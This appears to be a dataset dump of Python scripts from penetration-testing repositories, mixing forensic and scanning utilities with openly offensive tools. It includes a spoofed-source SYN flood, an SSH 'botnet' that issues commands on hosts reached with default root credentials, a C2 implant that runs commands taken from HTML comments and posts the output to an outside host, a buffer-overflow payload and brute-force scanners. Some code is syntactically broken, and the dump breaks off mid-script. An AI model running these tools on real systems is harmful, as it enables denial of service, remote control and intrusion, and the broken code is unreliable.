repo_name
stringclasses 29
values | text
stringlengths 18
367k
| avg_line_length
float64 5.6
132
| max_line_length
int64 11
3.7k
| alphnanum_fraction
float64 0.28
0.94
|
---|---|---|---|---|
cybersecurity-penetration-testing | import mechanize
url = "http://www.webscantest.com/business/access.php?serviceid="
attackNumber = 1
for i in range(5):
res = mechanize.urlopen(url+str(i))
content = res.read()
# check if the content is accessible
if content.find("You service") > 0:
print "Possible Direct Object Reference"
output = open('response/'+str(attackNumber)+'.txt', 'w')
output.write(content)
output.close()
print attackNumber
attackNumber += 1
| 24.157895 | 65 | 0.656184 |
Penetration-Testing-with-Shellcode | #!/usr/bin/python
from struct import *
buffer = ''
buffer += 'a'*27
buffer += pack("<Q", 0x00401340)
f = open("input.txt", "w")
f.write(buffer)
| 17.875 | 33 | 0.6 |
Python-Penetration-Testing-for-Developers | import httplib
import shelve
url = raw_input("Enter the full URL ")
url1 =url.replace("http://","")
url2= url1.replace("/","")
s = shelve.open("mohit.raj",writeback=True)
for u in s['php']:
a = "/"
url_n = url2+a+u
print url_n
http_r = httplib.HTTPConnection(url2)
u=a+u
http_r.request("GET",u)
reply = http_r.getresponse()
if reply.status == 200:
print "\n URL found ---- ", url_n
ch = raw_input("Press c for continue : ")
if ch == "c" or ch == "C" :
continue
else :
break
s.close() | 19.48 | 43 | 0.606654 |
Python-Penetration-Testing-for-Developers | import time, dpkt
import plotly.plotly as py
from plotly.graph_objs import *
from datetime import datetime
filename = 'hbot.pcap'
full_datetime_list = []
dates = []
for ts, pkt in dpkt.pcap.Reader(open(filename,'rb')):
eth=dpkt.ethernet.Ethernet(pkt)
if eth.type!=dpkt.ethernet.ETH_TYPE_IP:
continue
ip = eth.data
tcp=ip.data
if ip.p not in (dpkt.ip.IP_PROTO_TCP, dpkt.ip.IP_PROTO_UDP):
continue
if tcp.dport == 21 or tcp.sport == 21:
full_datetime_list.append((ts, str(time.ctime(ts))))
for t,d in full_datetime_list:
if d not in dates:
dates.append(d)
dates.sort(key=lambda date: datetime.strptime(date, "%a %b %d %H:%M:%S %Y"))
datecount = []
for d in dates:
counter = 0
for d1 in full_datetime_list:
if d1[1] == d:
counter += 1
datecount.append(counter)
data = Data([
Scatter(
x=dates,
y=datecount
)
])
plot_url = py.plot(data, filename='FTP Requests')
| 18.96 | 76 | 0.608826 |
cybersecurity-penetration-testing | #!/usr/bin/python
# -*- coding: utf-8 -*-
import urllib
from anonBrowser import *
def google(search_term):
ab = anonBrowser()
search_term = urllib.quote_plus(search_term)
response = ab.open('http://ajax.googleapis.com/'+\
'ajax/services/search/web?v=1.0&q='+ search_term)
print response.read()
google('Boondock Saint')
| 19.411765 | 55 | 0.65896 |
PenetrationTestingScripts | #!/usr/bin/env python
#coding:utf-8
#Author:se55i0n
#针对常见sql、No-sql数据库进行安全检查
import sys
import IPy
import time
import socket
import gevent
import argparse
from gevent import monkey
from multiprocessing.dummy import Pool as ThreadPool
from lib.config import *
from lib.exploit import *
monkey.patch_all()
class DBScanner(object):
def __init__(self, target, thread):
self.target = target
self.thread = thread
self.ips = []
self.ports = []
self.time = time.time()
self.get_ip()
self.get_port()
self.check = check()
def get_ip(self):
#获取待扫描地址段
for ip in IPy.IP(self.target):
self.ips.append(str(ip))
def get_port(self):
self.ports = list(p for p in service.itervalues())
def scan(self, ip, port):
try:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.settimeout(0.2)
if s.connect_ex((ip, port)) == 0:
self.handle(ip, port)
except Exception as e:
pass
finally:
s.close()
def handle(self, ip, port):
for v,k in service.iteritems():
if k == str(port):
if v == 'mysql':
self.check.mysql(ip)
elif v == 'mssql':
self.check.mssql(ip)
elif v == 'oracle':
self.check.oracle(ip)
elif v == 'postgresql':
self.check.postgresql(ip)
elif v == 'redis':
self.check.redis(ip)
elif v == 'mongodb':
self.check.mongodb(ip)
elif v == 'memcached':
self.check.memcached(ip)
else:
self.check.elasticsearch(ip)
def start(self, ip):
try:
gevents = []
for port in self.ports:
gevents.append(gevent.spawn(self.scan, ip, int(port)))
gevent.joinall(gevents)
except Exception as e:
pass
def run(self):
try:
pool = ThreadPool(processes=self.thread)
pool.map_async(self.start, self.ips).get(0xffff)
pool.close()
pool.join()
except Exception as e:
pass
except KeyboardInterrupt:
print u'\n{}[-] 用户终止扫描...{}'.format(R, W)
sys.exit(1)
finally:
print '-'*55
print u'{}[+] 扫描完成耗时 {} 秒.{}'.format(O, time.time()-self.time, W)
def banner():
banner = '''
____ ____ _____
/ __ \/ __ ) ___/_________ _____ ____ ___ _____
/ / / / __ \__ \/ ___/ __ `/ __ \/ __ \/ _ \/ ___/
/ /_/ / /_/ /__/ / /__/ /_/ / / / / / / / __/ /
/_____/_____/____/\___/\__,_/_/ /_/_/ /_/\___/_/
'''
print B + banner + W
print '-'*55
def main():
banner()
parser = argparse.ArgumentParser(description='Example: python {} 192.168.1.0/24'.format(sys.argv[0]))
parser.add_argument('target', help=u'192.168.1.0/24')
parser.add_argument('-t', type=int, default=50, dest='thread', help=u'线程数(默认50)')
args = parser.parse_args()
myscan = DBScanner(args.target, args.thread)
myscan.run()
if __name__ == '__main__':
main()
| 22.570175 | 102 | 0.584885 |
PenetrationTestingScripts | #!/usr/bin/env python
#
# https://github.com/git/git/blob/master/Documentation/technical/index-format.txt
#
import binascii
import collections
import mmap
import struct
import sys
def check(boolean, message):
if not boolean:
import sys
print "error: " + message
sys.exit(1)
def parse(filename, pretty=True):
with open(filename, "rb") as o:
f = mmap.mmap(o.fileno(), 0, access=mmap.ACCESS_READ)
def read(format):
# "All binary numbers are in network byte order."
# Hence "!" = network order, big endian
format = "! " + format
bytes = f.read(struct.calcsize(format))
return struct.unpack(format, bytes)[0]
index = collections.OrderedDict()
# 4-byte signature, b"DIRC"
index["signature"] = f.read(4).decode("ascii")
check(index["signature"] == "DIRC", "Not a Git index file")
# 4-byte version number
index["version"] = read("I")
check(index["version"] in {2, 3},
"Unsupported version: %s" % index["version"])
# 32-bit number of index entries, i.e. 4-byte
index["entries"] = read("I")
yield index
for n in range(index["entries"]):
entry = collections.OrderedDict()
entry["entry"] = n + 1
entry["ctime_seconds"] = read("I")
entry["ctime_nanoseconds"] = read("I")
if pretty:
entry["ctime"] = entry["ctime_seconds"]
entry["ctime"] += entry["ctime_nanoseconds"] / 1000000000
del entry["ctime_seconds"]
del entry["ctime_nanoseconds"]
entry["mtime_seconds"] = read("I")
entry["mtime_nanoseconds"] = read("I")
if pretty:
entry["mtime"] = entry["mtime_seconds"]
entry["mtime"] += entry["mtime_nanoseconds"] / 1000000000
del entry["mtime_seconds"]
del entry["mtime_nanoseconds"]
entry["dev"] = read("I")
entry["ino"] = read("I")
# 4-bit object type, 3-bit unused, 9-bit unix permission
entry["mode"] = read("I")
if pretty:
entry["mode"] = "%06o" % entry["mode"]
entry["uid"] = read("I")
entry["gid"] = read("I")
entry["size"] = read("I")
entry["sha1"] = binascii.hexlify(f.read(20)).decode("ascii")
entry["flags"] = read("H")
# 1-bit assume-valid
entry["assume-valid"] = bool(entry["flags"] & (0b10000000 << 8))
# 1-bit extended, must be 0 in version 2
entry["extended"] = bool(entry["flags"] & (0b01000000 << 8))
# 2-bit stage (?)
stage_one = bool(entry["flags"] & (0b00100000 << 8))
stage_two = bool(entry["flags"] & (0b00010000 << 8))
entry["stage"] = stage_one, stage_two
# 12-bit name length, if the length is less than 0xFFF (else, 0xFFF)
namelen = entry["flags"] & 0xFFF
# 62 bytes so far
entrylen = 62
if entry["extended"] and (index["version"] == 3):
entry["extra-flags"] = read("H")
# 1-bit reserved
entry["reserved"] = bool(entry["extra-flags"] & (0b10000000 << 8))
# 1-bit skip-worktree
entry["skip-worktree"] = bool(entry["extra-flags"] & (0b01000000 << 8))
# 1-bit intent-to-add
entry["intent-to-add"] = bool(entry["extra-flags"] & (0b00100000 << 8))
# 13-bits unused
# used = entry["extra-flags"] & (0b11100000 << 8)
# check(not used, "Expected unused bits in extra-flags")
entrylen += 2
if namelen < 0xFFF:
entry["name"] = f.read(namelen).decode("utf-8", "replace")
entrylen += namelen
else:
# Do it the hard way
name = []
while True:
byte = f.read(1)
if byte == "\x00":
break
name.append(byte)
entry["name"] = b"".join(name).decode("utf-8", "replace")
entrylen += 1
padlen = (8 - (entrylen % 8)) or 8
nuls = f.read(padlen)
check(set(nuls) == set(['\x00']), "padding contained non-NUL")
yield entry
f.close()
| 32.441176 | 87 | 0.488674 |
owtf | """
owtf.__main__
~~~~~~~~~~~~~
A __main__ method for OWTF so that internal services can be called as Python modules.
"""
import sys
from owtf.core import main
if __name__ == "__main__":
main()
| 15.75 | 85 | 0.595 |
cybersecurity-penetration-testing | #!/usr/bin/env python
from datetime import datetime
from matplotlib.dates import DateFormatter
import matplotlib.pyplot as plt
import os
from os.path import join
import sys
# max. number of bars on the histogram
NUM_BINS = 200
def gen_filestats(basepath):
"""Collects metadata about a directory tree.
Arguments:
basepath -- root directory to start from
Returns:
Tuple with list of file names and list of
stat results."""
filenames = []
filestats = []
for root, dirs, files in os.walk(basepath):
for f in files:
fullname = join(root, f)
filenames.append(fullname)
filestats.append(os.lstat(fullname))
return (filenames, filestats)
def show_date_histogram(times, heading='', block=False):
"""Draws and displays a histogram over the given timestamps.
Arguments:
times -- array of time stamps as seconds since 1970-01-01
heading -- heading to write to the drawing"""
fig, ax = plt.subplots()
times = map(lambda x: datetime.fromtimestamp(x).toordinal(), times)
ax.hist(times, NUM_BINS)
plt.xlabel('Date')
plt.ylabel('# of files')
plt.title(heading)
ax.autoscale_view()
ax.xaxis.set_major_formatter(DateFormatter('%Y-%m-%d'))
fig.autofmt_xdate()
fig.show()
if block:
plt.show()
if __name__ == '__main__':
if len(sys.argv) < 2:
print 'Usage %s base_directory' % sys.argv[0]
sys.exit(1)
path = sys.argv[1]
(names, stats) = gen_filestats(path)
# extract time stamps
mtimes = map(lambda x: x.st_mtime, stats)
atimes = map(lambda x: x.st_atime, stats)
show_date_histogram(mtimes, 'mtimes of ' + path)
show_date_histogram(atimes, 'atimes of ' + path, True)
| 22.84 | 71 | 0.634024 |
AggressorAssessor | #!/usr/bin/env python
import argparse
import smtplib
from email.MIMEMultipart import MIMEMultipart
from email.MIMEText import MIMEText
parser = argparse.ArgumentParser(description='beacon info')
parser.add_argument('--computer')
parser.add_argument('--ip')
args = parser.parse_args()
fromaddr = "<gmaile-mailaccounthere>"
toaddr = ["7777777777@txt.att.net", "8888888888@vtext.com"]
msg = MIMEMultipart()
msg['From'] = fromaddr
msg['To'] = ", ".join(toaddr)
msg['Subject'] = "INCOMING BEACON"
hostname = args.computer
internal_ip = args.ip
body = "Check your teamserver! \nHostname - " + hostname + "\nInternal IP - " + internal_ip
msg.attach(MIMEText(body, 'plain'))
server = smtplib.SMTP('smtp.gmail.com', 587)
server.starttls()
server.login(fromaddr, "<gmailpasswordhere>")
text = msg.as_string()
server.sendmail(fromaddr, toaddr, text)
server.quit()
| 25.875 | 91 | 0.733411 |
Effective-Python-Penetration-Testing | from capstone import *
import pefile
pe = pefile.PE('md5sum.exe')
entryPoint = pe.OPTIONAL_HEADER.AddressOfEntryPoint
data = pe.get_memory_mapped_image()[entryPoint:]
cs = Cs(CS_ARCH_X86, CS_MODE_32)
for i in cs.disasm(data, 0x1000):
print("0x%x:\t%s\t%s" %(i.address, i.mnemonic, i.op_str))
| 22.153846 | 61 | 0.7 |
Python-Penetration-Testing-for-Developers | import random
from scapy.all import *
target = raw_input("Enter the Target IP ")
i=1
while True:
a = str(random.randint(1,254))
b = str(random.randint(1,254))
c = str(random.randint(1,254))
d = str(random.randint(1,254))
dot = "."
src = a+dot+b+dot+c+dot+d
print src
st = random.randint(1,1000)
en = random.randint(1000,65535)
loop_break = 0
for srcport in range(st,en):
IP1 = IP(src=src, dst=target)
TCP1 = TCP(sport=srcport, dport=80)
pkt = IP1 / TCP1
send(pkt,inter= .0001)
print "packet sent ", i
loop_break = loop_break+1
i=i+1
if loop_break ==50 :
break
| 21 | 42 | 0.649241 |
cybersecurity-penetration-testing | #!/usr/bin/python
import re
import sys
def read_passwd(filename):
"""Reads entries from shadow or passwd files and
returns the content as list of entries.
Every entry is a list of fields."""
content = []
with open(filename, 'r') as f:
for line in f:
entry = line.strip().split(':')
content.append(entry)
return content
def detect_aliases(passwd):
"""Prints users who share a user id on the console
Arguments:
passwd -- contents of /etc/passwd as read by read_passwd"""
id2user = {}
for entry in passwd:
username = entry[0]
uid = entry[2]
if uid in id2user:
print 'User "%s" is an alias for "%s" with uid=%s' % (username, id2user[uid], uid)
else:
id2user[uid] = username
def detect_missing_users(passwd, shadow):
"""Prints users of /etc/passwd missing in /etc/shadow
and vice versa.
Arguments:
passwd -- contents of /etc/passwd as read by read_passwd
shadow -- contents of /etc/shadow as read by read_passwd"""
passwd_users = set([e[0] for e in passwd])
shadow_users = set([e[0] for e in shadow])
missing_in_passwd = shadow_users - passwd_users
if len(missing_in_passwd) > 0:
print 'Users missing in passwd: %s' % ', '.join(missing_in_passwd)
missing_in_shadow = passwd_users - shadow_users
if len(missing_in_shadow) > 0:
print 'Users missing in shadow: %s' % ', '.join(missing_in_shadow)
def detect_unshadowed(passwd, shadow):
"""Prints users who are not using shadowing or have no password set
Arguments:
passwd -- contents of /etc/passwd as read by read_passwd"""
nopass = [e[0] for e in passwd if e[1]=='']
nopass.extend([e[0] for e in shadow if e[1]==''])
if len(nopass) > 0:
print 'Users without password: %s' % ', '.join(nopass)
unshadowed = [e[0] for e in passwd if e[1] != 'x' and e[1] != '']
if len(unshadowed) > 0:
print 'Users not using password-shadowing: %s' % \
', '.join(unshadowed)
def detect_deviating_hashing(shadow):
"""Prints users with non-standard hash methods for passwords
Arguments:
shadow -- contents of /etc/shadow as read by read_passwd"""
noalgo = set()
salt2user = {}
algorithms = set()
for entry in shadow:
pwhash = entry[1]
if len(pwhash) < 3:
continue
m = re.search(r'^\$([^$]{1,2})\$([^$]+)\$', pwhash)
if not m:
noalgo.add(entry[0])
continue
algo = m.group(1)
salt = m.group(2)
if salt in salt2user:
print 'Users "%s" and "%s" share same password salt "%s"' % \
(salt2user[salt], entry[0], salt)
else:
salt2user[salt] = entry[0]
algorithms.add(algo)
if len(algorithms) > 1:
print 'Multiple hashing algorithms found: %s' % ', '.join(algorithms)
if len(noalgo) > 0:
print 'Users without hash algorithm spec. found: %s' % \
', '.join(noalgo)
if __name__ == '__main__':
if len(sys.argv) < 3:
print 'Usage %s /path/to/passwd /path/to/shadow' % sys.argv[0]
sys.exit(1)
passwd = read_passwd(sys.argv[1])
shadow = read_passwd(sys.argv[2])
detect_aliases(passwd)
detect_missing_users(passwd, shadow)
detect_unshadowed(passwd, shadow)
detect_deviating_hashing(shadow)
| 28.487395 | 94 | 0.572976 |
owtf | """
Plugin for probing mssql
"""
from owtf.managers.resource import get_resources
from owtf.plugin.helper import plugin_helper
DESCRIPTION = " MsSql Probing "
def run(PluginInfo):
resource = get_resources("BruteMsSqlProbeMethods")
return plugin_helper.CommandDump("Test Command", "Output", resource, PluginInfo, [])
| 24.230769 | 88 | 0.752294 |
owtf | """
owtf.net.scanner
~~~~~~~~~~~~~~~~
The scan_network scans the network for different ports and call network plugins for different services running on target
"""
import logging
import re
from owtf.config import config_handler
from owtf.db.session import get_scoped_session
from owtf.managers.plugin import get_plugins_by_group
from owtf.settings import NET_SCANS_PATH
from owtf.shell.base import shell
from owtf.utils.file import FileOperations
__all__ = ["Scanner"]
# Folder under which all scans will be saved
PING_SWEEP_FILE = "{}/00_ping_sweep".format(NET_SCANS_PATH)
DNS_INFO_FILE = "{}/01_dns_info".format(NET_SCANS_PATH)
FAST_SCAN_FILE = "{}/02_fast_scan".format(NET_SCANS_PATH)
STD_SCAN_FILE = "{}/03_std_scan".format(NET_SCANS_PATH)
FULL_SCAN_FILE = "{}/04_full_scan".format(NET_SCANS_PATH)
class Scanner(object):
def __init__(self):
self.shell = shell
self.session = get_scoped_session()
# Create the missing scans folder inside the owtf_review directory.
FileOperations.create_missing_dirs(NET_SCANS_PATH)
def ping_sweep(self, target, scantype):
"""Do a ping sweep
:param target: Target to scan
:type target: `str`
:param scantype: Type of scan
:type scantype: `str`
:return: None
:rtype: None
"""
if scantype == "full":
logging.info("Performing Intense Host discovery")
self.shell.shell_exec(
"nmap -n -v -sP -PE -PP -PS21,22,23,25,80,443,113,21339 -PA80,113,443,10042"
" --source_port 53 {!s} -oA {!s}".format(target, PING_SWEEP_FILE)
)
if scantype == "arp":
logging.info("Performing ARP host discovery")
self.shell.shell_exec(
"nmap -n -v -sP -PR {!s} -oA {!s}".format(target, PING_SWEEP_FILE)
)
self.shell.shell_exec(
'grep Up {!s}.gnmap | cut -f2 -d" " > {!s}.ips'.format(
PING_SWEEP_FILE, PING_SWEEP_FILE
)
)
def dns_sweep(self, file_with_ips, file_prefix):
"""Do a DNS sweep
:param file_with_ips: Path of file with IP addresses
:type file_with_ips: `str`
:param file_prefix: File name prefix
:type file_prefix: `str`
:return: None
:rtype: None
"""
logging.info(
"Finding misconfigured DNS servers that might allow zone transfers among live ips .."
)
self.shell.shell_exec(
"nmap -PN -n -sS -p 53 -iL {!s} -oA {!s}".format(file_with_ips, file_prefix)
)
# Step 2 - Extract IPs
dns_servers = "{!s}.dns_server.ips".format(file_prefix)
self.shell.shell_exec(
'grep "53/open/tcp" {!s}.gnmap | cut -f 2 -d " " > {!s}'.format(
file_prefix, dns_servers
)
)
file = FileOperations.open(dns_servers)
domain_names = "{!s}.domain_names".format(file_prefix)
self.shell.shell_exec("rm -f {!s}".format(domain_names))
num_dns_servers = 0
for line in file:
if line.strip("\n"):
dns_server = line.strip("\n")
self.shell.shell_exec(
"host {} {} | grep 'domain name' | cut -f 5 -d' ' | cut -f 2,3,4,5,6,7 -d. "
"| sed 's/\.$//' >> {}".format(dns_server, dns_server, domain_names)
)
num_dns_servers += 1
try:
file = FileOperations.open(domain_names, owtf_clean=False)
except IOError:
return
for line in file:
domain = line.strip("\n")
raw_axfr = "{!s}.{!s}.{!s}.axfr.raw".format(file_prefix, dns_server, domain)
self.shell.shell_exec(
"host -l {!s} {!s} | grep {!s} > {!s}".format(
domain, dns_server, domain, raw_axfr
)
)
success = self.shell.shell_exec(
"wc -l {!s} | cut -f 1 -d ' '".format(raw_axfr)
)
if success > 3:
logging.info(
"Attempting zone transfer on $dns_server using domain {!s}.. Success!".format(
domain
)
)
axfr = "{!s}.{!s}.{!s}.axfr".format(file_prefix, dns_server, domain)
self.shell.shell_exec("rm -f {!s}".format(axfr))
logging.info(
self.shell.shell_exec(
"grep 'has address' {!s} | cut -f 1,4 -d ' ' | sort -k 2 -t ' ' "
"| sed 's/ /#/g'".format(raw_axfr)
)
)
else:
logging.info(
"Attempting zone transfer on $dns_server using domain %s.. Success!",
domain,
)
self.shell.shell_exec("rm -f {!s}".format(raw_axfr))
if num_dns_servers == 0:
return
def scan_and_grab_banners(
self, file_with_ips, file_prefix, scan_type, nmap_options
):
"""Scan targets and grab service banners
:param file_with_ips: Path to file with IPs
:type file_with_ips: `str`
:param file_prefix: File name prefix
:type file_prefix: `str`
:param scan_type: Type of scan
:type scan_type: `str`
:param nmap_options: nmap options
:type nmap_options: `str`
:return: None
:rtype: None
"""
if scan_type == "tcp":
logging.info(
"Performing TCP portscan, OS detection, Service detection, banner grabbing, etc"
)
self.shell.shell_exec(
"nmap -PN -n -v --min-parallelism=10 -iL {!s} -sS -sV -O -oA {!s}.tcp {!s}".format(
file_with_ips, file_prefix, nmap_options
)
)
self.shell.shell_exec(
"amap -1 -i {!s}.tcp.gnmap -Abq -m -o {!s}.tcp.amap -t 90 -T 90 -c 64".format(
file_prefix, file_prefix
)
)
if scan_type == "udp":
logging.info(
"Performing UDP portscan, Service detection, banner grabbing, etc"
)
self.shell.shell_exec(
"nmap -PN -n -v --min-parallelism=10 -iL {!s} -sU -sV -O -oA {!s}.udp {!s}".format(
file_with_ips, file_prefix, nmap_options
)
)
self.shell.shell_exec(
"amap -1 -i {}.udp.gnmap -Abq -m -o {}.udp.amap".format(
file_prefix, file_prefix
)
)
@staticmethod
def get_nmap_services_file():
"""Return default NMAP services file
:return: Path to the file
:rtype: `str`
"""
return "/usr/share/nmap/nmap-services"
def get_ports_for_service(self, service, protocol):
"""Get ports for different services
:param service: Service name
:type service: `str`
:param protocol: Protocol
:type protocol: `str`
:return: List of ports
:rtype: `list`
"""
regexp = "(.*?)\t(.*?/.*?)\t(.*?)($|\t)(#.*){0,1}"
re.compile(regexp)
list = []
f = FileOperations.open(self.get_nmap_services_file())
for line in f.readlines():
if line.lower().find(service) >= 0:
match = re.findall(regexp, line)
if match:
port = match[0][1].split("/")[0]
prot = match[0][1].split("/")[1]
if not protocol or protocol == prot and port not in list:
list.append(port)
f.close()
return list
def target_service(self, nmap_file, service):
"""Services for a target
:param nmap_file: Path to nmap file
:type nmap_file: `str`
:param service: Service to get
:type service: `str`
:return: Response
:rtype: `str`
"""
ports_for_service = self.get_ports_for_service(service, "")
f = FileOperations.open(nmap_file.strip())
response = ""
for host_ports in re.findall("Host: (.*?)\tPorts: (.*?)[\t\n]", f.read()):
host = host_ports[0].split(" ")[0] # Remove junk at the end
ports = host_ports[1].split(",")
for port_info in ports:
if len(port_info) < 1:
continue
chunk = port_info.split("/")
port = chunk[0].strip()
port_state = chunk[1].strip()
# No point in wasting time probing closed/filtered ports!!
# (nmap sometimes adds these to the gnmap file for some reason ..)
if port_state in ["closed", "filtered"]:
continue
try:
prot = chunk[2].strip()
except BaseException:
continue
if port in ports_for_service:
response += "{!s}:{!s}:{!s}##".format(host, port, prot)
f.close()
return response
def probe_service_for_hosts(self, nmap_file, target):
"""Probe a service for a domain
:param nmap_file: Path to nmap file
:type nmap_file: `str`
:param target: Target name
:type target: `str`
:return: List of services
:rtype: `list`
"""
services = []
# Get all available plugins from network plugin order file
net_plugins = get_plugins_by_group(self.session, plugin_group="network")
for plugin in net_plugins:
services.append(plugin["Name"])
services.append("http")
total_tasks = 0
tasklist = ""
plugin_list = []
http = []
for service in services:
if plugin_list.count(service) > 0:
continue
tasks_for_service = len(
self.target_service(nmap_file, service).split("##")
) - 1
total_tasks += tasks_for_service
tasklist = "{!s} [ {!s} - {!s} tasks ]".format(
tasklist, service, str(tasks_for_service)
)
for line in self.target_service(nmap_file, service).split("##"):
if line.strip("\n"):
ip = line.split(":")[0]
port = line.split(":")[1]
plugin_to_invoke = service
service1 = plugin_to_invoke
config_handler.set(
"{!s}_PORT_NUMBER".format(service1.upper()), port
)
if service != "http":
plugin_list.append(plugin_to_invoke)
http.append(port)
logging.info(
"We have to probe %s:%s for service %s",
str(ip),
str(port),
plugin_to_invoke,
)
return http
def scan_network(self, target):
"""Do a ping sweep for a target
:param target: Target url
:type target: `str`
:return: None
:rtype: None
"""
self.ping_sweep(target.split("//")[1], "full")
self.dns_sweep("{}.ips".format(PING_SWEEP_FILE), DNS_INFO_FILE)
def probe_network(self, target, protocol, port):
"""Probe network for services
:param target: target url
:type target: `str`
:param protocol: Protocol scan
:type protocol: `str`
:param port: Port number for target
:type port: `str`
:return: List of services running
:rtype: list
"""
self.scan_and_grab_banners(
"{0}.ips".format(PING_SWEEP_FILE),
FAST_SCAN_FILE,
protocol,
"-p" + str(port),
)
return self.probe_service_for_hosts(
"{0}.{1}.gnmap".format(FAST_SCAN_FILE, protocol), target.split("//")[1]
)
| 35.161194 | 120 | 0.495253 |
cybersecurity-penetration-testing | import requests
import re
import subprocess
import time
import os
while 1:
req = requests.get("http://127.0.0.1")
comments = re.findall('<!--(.*)-->',req.text)
for comment in comments:
if comment = " ":
os.delete(__file__)
else:
try:
response = subprocess.check_output(comment.split())
except:
response = �command fail�
data={"comment":(''.join(response)).encode("base64")}
newreq = requests.post("http://127.0.0.1notmalicious.com/xss/easy/addguestbookc2.php ", data=data)
time.sleep(30)
| 23.666667 | 99 | 0.667311 |
owtf | class BaseWorker(object):
pass
| 11 | 25 | 0.714286 |
cybersecurity-penetration-testing | #!/usr/bin/python
# -*- coding: utf-8 -*-
import optparse
import pxssh
class Client:
def __init__(self, host, user, password):
self.host = host
self.user = user
self.password = password
self.session = self.connect()
def connect(self):
try:
s = pxssh.pxssh()
s.login(self.host, self.user, self.password)
return s
except Exception, e:
print e
print '[-] Error Connecting'
def send_command(self, cmd):
self.session.sendline(cmd)
self.session.prompt()
return self.session.before
def botnetCommand(command):
for client in botNet:
output = client.send_command(command)
print '[*] Output from ' + client.host
print '[+] ' + output
def addClient(host, user, password):
client = Client(host, user, password)
botNet.append(client)
botNet = []
addClient('127.0.0.1', 'root', 'toor')
addClient('127.0.0.1', 'root', 'toor')
addClient('127.0.0.1', 'root', 'toor')
botnetCommand('uname -v')
botnetCommand('cat /etc/issue')
| 21.489796 | 56 | 0.584015 |
Python-Penetration-Testing-Cookbook | from urllib2 import urlopen
from xml.etree.ElementTree import parse
url = urlopen('http://feeds.feedburner.com/TechCrunch/Google')
xmldoc = parse(url)
xmldoc.write('output.xml')
for item in xmldoc.iterfind('channel/item'):
title = item.findtext('title')
desc = item.findtext('description')
date = item.findtext('pubDate')
link = item.findtext('link')
print title
print desc
print date
print link
print '---------'
| 24.166667 | 62 | 0.681416 |
cybersecurity-penetration-testing | import os
import sys
import logging
import argparse
import plugins
import writers
import colorama
from datetime import datetime
from pyfiglet import Figlet
colorama.init()
__author__ = 'Preston Miller & Chapin Bryce'
__date__ = '20160401'
__version__ = 0.01
__description__ = 'This script is our framework controller and handles each plugin'
class Framework(object):
def __init__(self, input_directory, output_directory, log, **kwargs):
self.input = input_directory
self.output = output_directory
logging.basicConfig(filename=log, level=logging.DEBUG,
format='%(asctime)s | %(levelname)s | %(message)s', filemode='a')
self.log = logging.getLogger(log)
self.kwargs = kwargs
def run(self):
msg = 'Initializing framework v' + str(__version__)
print '[+]', msg
self.log.info(msg)
f = Figlet(font='doom')
print f.renderText('Framework')
self.log.debug('System ' + sys.platform)
self.log.debug('Version ' + sys.version)
if not os.path.exists(self.output):
os.makedirs(self.output)
self._list_files()
self._run_plugins()
def _list_files(self):
msg = 'Indexing {}'.format(self.input)
print '[+]', msg
logging.info(msg)
self.wal_files = []
self.setupapi_files = []
self.userassist_files = []
self.exif_metadata = []
self.office_metadata = []
self.id3_metadata = []
self.pst_files = []
for root, subdir, files in os.walk(self.input, topdown=True):
for file_name in files:
current_file = os.path.join(root, file_name)
current_file = current_file.decode('utf-8').lower()
if not os.path.isfile(current_file):
logging.warning(u"Could not parse file {}... Skipping...".format((current_file)))
continue
ext = os.path.splitext(current_file)[1]
if current_file.endswith('ntuser.dat'):
self.userassist_files.append(current_file)
elif 'setupapi.dev.log' in current_file:
self.setupapi_files.append(current_file)
elif ext == '.jpeg' or ext == '.jpg':
self.exif_metadata.append(current_file)
elif ext == '.docx' or ext == '.pptx' or ext == '.xlsx':
self.office_metadata.append(current_file)
elif ext == '.mp3':
self.id3_metadata.append(current_file)
elif ext == '.pst':
self.pst_files.append(current_file)
elif ext.endswith('-wal'):
self.wal_files.append(current_file)
else:
continue
def _run_plugins(self):
# Run Wal Crawler
if len(self.wal_files) > 0:
wal_plugin = Framework.Plugin('wal_crawler', self.wal_files, self.log)
wal_output = os.path.join(self.output, 'wal')
wal_plugin.run(plugins.wal_crawler.main)
if self.kwargs['excel'] is True:
wal_plugin.write(wal_output, recursion=1, excel=1)
else:
wal_plugin.write(wal_output, recursion=1)
# Run Setupapi Parser
if len(self.setupapi_files) > 0:
setupapi_plugin = Framework.Plugin('setupapi', self.setupapi_files, self.log)
setupapi_output = os.path.join(self.output, 'setupapi')
setupapi_plugin.run(plugins.setupapi.main)
if self.kwargs['excel'] is True:
setupapi_plugin.write(setupapi_output, recursion=1, excel=1)
else:
setupapi_plugin.write(setupapi_output, recursion=1)
# Run Userassist Parser
if len(self.userassist_files) > 0:
userassist_plugin = Framework.Plugin('userassist', self.userassist_files, self.log)
userassist_output = os.path.join(self.output, 'userassist')
userassist_plugin.run(plugins.userassist.main)
if self.kwargs['excel'] is True:
userassist_plugin.write(userassist_output, recursion=1, excel=1)
else:
userassist_plugin.write(userassist_output, recursion=1)
# Run EXIF metadata parser
if len(self.exif_metadata) > 0:
exif_metadata_plugin = Framework.Plugin('exif_metadata', self.exif_metadata, self.log)
exif_metadata_output = os.path.join(self.output, 'metadata')
exif_metadata_plugin.run(plugins.exif.main)
if self.kwargs['excel'] is True:
exif_metadata_plugin.write(exif_metadata_output, excel=1)
else:
exif_metadata_plugin.write(exif_metadata_output)
# Run office metadata parser
if len(self.office_metadata) > 0:
office_metadata_plugin = Framework.Plugin('office_metadata', self.office_metadata, self.log)
office_metadata_output = os.path.join(self.output, 'metadata')
office_metadata_plugin.run(plugins.office.main)
if self.kwargs['excel'] is True:
office_metadata_plugin.write(office_metadata_output, excel=1)
else:
office_metadata_plugin.write(office_metadata_output)
# Run ID3 metadata parser
if len(self.id3_metadata) > 0:
id3_metadata_plugin = Framework.Plugin('id3_metadata', self.id3_metadata, self.log)
id3_metadata_output = os.path.join(self.output, 'metadata')
id3_metadata_plugin.run(plugins.id3.main)
if self.kwargs['excel'] is True:
id3_metadata_plugin.write(id3_metadata_output, excel=1)
else:
id3_metadata_plugin.write(id3_metadata_output)
# Run PST parser
if len(self.pst_files) > 0:
pst_plugin = Framework.Plugin('pst', self.pst_files, self.log)
pst_output = os.path.join(self.output, 'pst')
pst_plugin.run(plugins.pst_indexer.main)
if self.kwargs['excel'] is True:
pst_plugin.write(pst_output, recursion=1, excel=1)
else:
pst_plugin.write(pst_output, recursion=1)
class Plugin(object):
def __init__(self, plugin, files, log):
self.plugin = plugin
self.files = files
self.log = log
self.results = {'data': [], 'headers': None}
def run(self, function):
msg = 'Executing {} plugin'.format(self.plugin)
